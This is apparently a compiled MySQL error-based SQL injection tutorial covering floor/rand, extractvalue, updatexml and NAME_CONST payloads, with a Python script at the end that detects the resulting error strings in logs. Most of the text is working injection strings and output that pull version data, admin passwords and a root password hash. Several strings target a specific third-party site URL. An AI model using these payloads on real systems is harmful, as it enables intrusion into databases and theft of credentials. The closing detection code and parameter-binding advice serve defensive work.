1. Error-based injection via floor()
Payloads such as the following can be used:
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version has been leaked through the error message. To retrieve other data, replace version() with a subquery for the value you want.
For example, to retrieve the administrator's username and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test payload:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test payload:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error uplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error uplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injecting with NAME_CONST
It's been a while since I've made an SQL injection tutorial, so I thought I should make a new tutorial using the name_const method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1);
+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error uplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here, so let's get this going again...
Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error uplicate column name '1

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error uplicate column name 'com_admanage
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error uplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
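The error strings quoted throughout this page (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name) are exactly what a defender finds in application or database logs when these payloads are tried. As an added example, not part of the original post, the Python below classifies such log lines by technique and pulls out the value that was leaked; the log lines are constructed to match the errors quoted above, and the 5.7+ spelling of the group-by key ('<group_key>') is assumed from MySQL's own messages.

```python
import re
from typing import List, Optional, Tuple

# MySQL error signatures for the error-based techniques quoted on this page.
# MySQL 5.7 and later write the group-by key as '<group_key>'; older versions omit the brackets.
SIGNATURES = [
    ("floor_groupby",
     re.compile(r"ERROR 1062 \(23000\): Duplicate entry '(?P<v>.*)' for key '<?group_key>?'")),
    ("extractvalue_updatexml",
     re.compile(r"ERROR 1105 \(HY000\): XPATH syntax error: '(?P<v>.*)'")),
    ("name_const",
     re.compile(r"Duplicate column name '(?P<v>.*)'")),
]


def classify(line: str) -> Optional[Tuple[str, str]]:
    """Return (technique, leaked_value) if the line carries a known signature, else None."""
    for technique, rx in SIGNATURES:
        m = rx.search(line)
        if m:
            value = m.group("v")
            if technique == "floor_groupby" and value and value[-1] in "01":
                # concat(..., floor(rand(0)*2)) appends a 0 or 1 to the leaked value
                value = value[:-1]
            return technique, value
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, technique, leaked_value) for every matching line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = classify(line)
        if hit:
            hits.append((number, *hit))
    return hits


# Constructed sample log lines (not real captures), shaped like the errors quoted on this page.
SAMPLE_LOG = [
    "2024-01-01T10:00:01 app[123]: GET /article?id=1 200",
    "2024-01-01T10:00:02 app[123]: db: ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "2024-01-01T10:00:03 app[123]: db: ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "2024-01-01T10:00:04 app[123]: db: ERROR 1060 (42S21): Duplicate column name '5.0.27-community-nt'",
]

if __name__ == "__main__":
    for number, technique, value in scan(SAMPLE_LOG):
        print(f"line {number}: {technique} leaked {value!r}")
```

If these strings appear in the application's HTTP responses rather than only in its logs, the database error is being echoed to the client; suppressing that echo and binding id as a query parameter removes both the leak channel and the injection itself.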